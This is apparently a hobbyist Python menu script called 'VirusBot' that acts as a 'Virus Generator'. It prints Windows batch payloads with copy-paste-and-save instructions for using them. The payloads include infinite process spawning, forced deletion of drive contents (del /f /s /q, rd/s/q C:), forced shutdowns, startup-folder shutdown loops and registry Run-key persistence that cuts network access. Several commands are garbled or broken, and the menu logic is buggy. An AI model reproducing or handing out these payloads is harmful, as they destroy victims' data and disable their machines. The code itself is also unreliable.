### Welcome To AlienBot Database ###
import pyfiglet
import os
import platform
import socket
from os import system, name
mainName = "                     Created by Kaveesha Anuhas"
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[92m'
    MAIN = '\033[95m'
    MAIN1 = '\033[96m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def clear():
  
    if name == 'nt':
        _ = system('cls')
  
    else:
        _ = system('clear')
hostname = socket.gethostname()    
IPAddress = socket.gethostbyname(hostname)
if mainName == '                     Created by Kaveesha Anuhas':
    ascii_banner = pyfiglet.figlet_format("Welcome To VirusBot")
    print(bcolors.MAIN+ascii_banner)
    print(bcolors.WARNING+mainName)
    print("")
    print(bcolors.MAIN1+"Enter your name")
    print("          ")
    username = input("VirusBot@Admin:>")
    clear()
    ascii_banner = pyfiglet.figlet_format("Hello "+username+"!")
    print(bcolors.MAIN+ascii_banner)
    print("1. Virus")
    print("2. System Killer")
    print("3. Info")
    print("4. Exit")
    print("          ")
    as2353 = input("VirusBot@"+username+":>")
    if as2353 == '4. Exit'or as2353 == '4'or as2353 =='4.':
        ascii_banner = pyfiglet.figlet_format("Goodbay "+username+"!")
        print(bcolors.MAIN+ascii_banner)
    elif as2353 == '2. System Killer'or as2353 =='2'or as2353 =='2.':
        clear()
        ascii_banner = pyfiglet.figlet_format("System Killer")
        print(bcolors.FAIL+ascii_banner)
        print(" ")
        asd234 = input("Are you sure to start system killer N/Y ")
        if as2353 == 'y' or as2353 == 'yes':
            print("#"*1000000)
        else:
            clear()
            ascii_banner = pyfiglet.figlet_format("Goodbay "+username)
            print(bcolors.MAIN+ascii_banner)
    elif as2353 == '3. Info'or as2353 =='3'or as2353 =='3.':
        clear()
        ascii_banner = pyfiglet.figlet_format("Info")
        print(bcolors.MAIN1+ascii_banner)
        print("  ")
        print(bcolors.MAIN+"System Info")
        print(" ")
        print(bcolors.MAIN1+"Os --> "+os.name)
        print(bcolors.MAIN1+"System Os --> "+platform.system())
        print(bcolors.MAIN1+"System Release --> "+platform.release())
        print(bcolors.MAIN1+"Username --> "+username)
        print(bcolors.MAIN1+"Admin Username --> "+os.getlogin())
        print(bcolors.MAIN1+"ip --> "+IPAddress)
        print(" ")
        print(bcolors.FAIL+"VirusBot Info")
        print(" ")
        print(bcolors.WARNING+"Developer --> Kaveesha Anuhas")
        print(bcolors.WARNING+"organization --> AlienBot")
        print(bcolors.WARNING+"Version --> 1.0")
        
    else:
        clear()
        ascii_banner = pyfiglet.figlet_format("Virus Generator")
        print(bcolors.FAIL+ascii_banner)
        print("    ")
        print("1. Unlimited Killer")
        print("2. Dangerous Virus")
        print("3. I Love You Virus")
        print("4. Disable Internet Virus")
        print("5. Formate Drives in 3 Seconds Virus")
        print("6. Crush The Window Virus")
        print("7. Shutdown the computer every time on startup Virus")
        print("   ")
        virus127 = input("VirusBot@"+username+":>")
        if virus127 == "1. Unlimited Killer" or virus127 == "1." or virus127 == "1":
            clear()
            ascii_banner = pyfiglet.figlet_format("Unlimited Killer")
            print(bcolors.MAIN1+ascii_banner)
            print("    ")
            print("1. Unlimited Notepad")
            print("2. Application Bomber")
            print("   ")
            virus1127 = input("VirusBot@"+username+":>")
            if virus1127 == "1. Unlimited Notepad" or virus127 == "1." or virus127 == "1":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Opening Unlimited Notepade")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+bcolors.BOLD+"Virus Code")
                print("   ")
                print(bcolors.MAIN+"@ECHO off")
                print(bcolors.MAIN+" :top")
                print(bcolors.MAIN+" START %SystemRoot%\system32\notepad.exe")
                print(bcolors.MAIN+" GOTO top")
            elif virus1127 == "2. Application Bomber" or virus127 == "2." or virus127 == "2":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Opening Unlimited Application")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+bcolors.BOLD+"Virus Code")
                print("   ")
                print(bcolors.MAIN+"@ECHO off")
                print(bcolors.MAIN+"start winword")
                print(bcolors.MAIN+"start mspaint")
                print(bcolors.MAIN+"start notepad")
                print(bcolors.MAIN+"start write")
                print(bcolors.MAIN+"start cmd")
                print(bcolors.MAIN+"goto x")
            else:
                pass
        elif virus127 == "2. Dangerous Virus" or virus127 == "2." or virus127 == "2":
            clear()
            print("  ")
            print(bcolors.FAIL+"Damages")
            print(bcolors.FAIL+"***************")
            print(" ")
            print(bcolors.MAIN1+"How To Do It")
            print(bcolors.MAIN1+"-----------------------")
            print(bcolors.MAIN1+"1) Copy Under Code")
            print(bcolors.MAIN1+"2) Past Code In Notepade")
            print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
            print(bcolors.MAIN1+"4) Now You Can Use Virus")
            print("   ")
            print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
            print("   ")
            print(bcolors.MAIN+"@ECHO off")
            print(bcolors.MAIN+"del D:*.* /f /s /q")
            print(bcolors.MAIN+"del E:*.* /f /s /q")
            print(bcolors.MAIN+"del F:*.* /f /s /q")
            print(bcolors.MAIN+"del G:*.* /f /s /q")
            print(bcolors.MAIN+"del H:*.* /f /s /q")
            print(bcolors.MAIN+"del I:*.* /f /s /q")
            print(bcolors.MAIN+"del J:*.* /f /s /q")
            print(" ")
            print(bcolors.WARNING+"WARNING:: This is the most dangerous virus! Be careful with its use.")
        elif virus127 == "3. I Love You Virus" or virus127 == "3." or virus127 == "3":
            clear()
            print("  ")
            print(bcolors.FAIL+"Damages")
            print(bcolors.FAIL+"*ShutDown Pc")
            print(" ")
            print(bcolors.MAIN1+"How To Do It")
            print(bcolors.MAIN1+"-----------------------")
            print(bcolors.MAIN1+"1) Copy Under Code")
            print(bcolors.MAIN1+"2) Past Code In Notepade")
            print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
            print(bcolors.MAIN1+"4) Now You Can Use Virus")
            print("   ")
            print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
            print("   ")
            print(bcolors.MAIN+"@ECHO off")
            print(bcolors.MAIN+"msg * I don’t like you")
            print(bcolors.MAIN+"shutdown -c “Error! You are too stupid!” -s")

        elif virus127 == "4. Disable Internet Virus" or virus127 == "4." or virus127 == "4":
            clear()
            ascii_banner = pyfiglet.figlet_format("Disable Internet Virus")
            print(bcolors.MAIN1+ascii_banner)
            print("    ")
            print("1. Disable Internet Permanently")
            print("2. Stop Internet Access")
            print("   ")
            virus11127 = input("VirusBot@"+username+":>")
            if virus11127 == "1. Disable Internet Permanently" or virus11127 == "1." or virus11127 == "1":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Disable the internet connectivity permanently.")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
                print("   ")
                print(bcolors.MAIN+"echo @echo off>c:windowswimn32.bat")
                print(bcolors.MAIN+"echo break off>c:windowswimn32.bat echo")
                print(bcolors.MAIN+"ipconfig/release_all>c:windowswimn32.bat")
                print(bcolors.MAIN+"echo end>c:windowswimn32.batreg add")
                print(bcolors.MAIN+"hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add")
                print(bcolors.MAIN+"hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!")
                print(bcolors.MAIN+"PAUSE")   
            elif virus11127 == "2. Stop Internet Access" or virus11127 == "2." or virus11127 == "2":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Stop the internet connectivity")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
                print("   ")
                print(bcolors.MAIN+"@Echo off")
                print(bcolors.MAIN+"pconfig /releaseo")      
            else:
                pass
        elif virus127 == "5. Formate Drives in 3 Seconds" or virus127 == "5." or virus127 == "5":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Formate Drives")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
                print("   ")
                print(bcolors.MAIN+"“rd/s/q D:")
                print(bcolors.MAIN+"rd/s/q C:")  
                print(bcolors.MAIN+"rd/s/q E:” ")
        elif virus127 == "6. Crush The Window" or virus127 == "6." or virus127 == "6":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Crush The Window")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) Save As 'Virus.bat'")
                print(bcolors.MAIN1+"4) Now You Can Use Virus")
                print("   ")
                print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
                print("   ")
                print(bcolors.MAIN+"@Echo off")
                print(bcolors.MAIN+"Del C: *.* |y")  
                #print(bcolors.MAIN+"rd/s/q E:” ")        
        elif virus127 == "7. Shutdown the computer every time on startup Virus" or virus127 == "7." or virus127 == "7":
                clear()
                print("  ")
                print(bcolors.FAIL+"Damages")
                print(bcolors.FAIL+"*Shutdown the computer every time on startup!")
                print(" ")
                print(bcolors.MAIN1+"How To Do It")
                print(bcolors.MAIN1+"-----------------------")
                print(bcolors.MAIN1+"1) Copy Under Code")
                print(bcolors.MAIN1+"2) Past Code In Notepade")
                print(bcolors.MAIN1+"3) File >> Save As")
                print(bcolors.MAIN1+"4) Name it: virus.bat")
                print(bcolors.MAIN1+"5) Right Click on Startup >> Open")
                print(bcolors.MAIN1+"6) This open the Startup folder")
                print(bcolors.MAIN1+"7) Paste the Virus.bat file here!")
                print("   ")
                print(bcolors.MAIN1+"Virus Code"+bcolors.BOLD)
                print("   ")
                print(bcolors.MAIN+"@ECHO OFF")
                print(bcolors.MAIN+"shutdown -s -t 10 -c “Virus Attack…”")  
                print(bcolors.MAIN+"exit")    
        else:
            pass
else:
    clear()
    ascii_banner = pyfiglet.figlet_format("Error")
    print(bcolors.MAIN+ascii_banner)
    print('You Cant Edit Alienbot Code')
